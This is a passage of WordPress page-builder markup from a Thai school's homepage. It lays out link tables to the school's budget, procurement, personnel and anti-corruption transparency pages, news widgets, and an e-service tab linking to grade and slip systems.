href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img 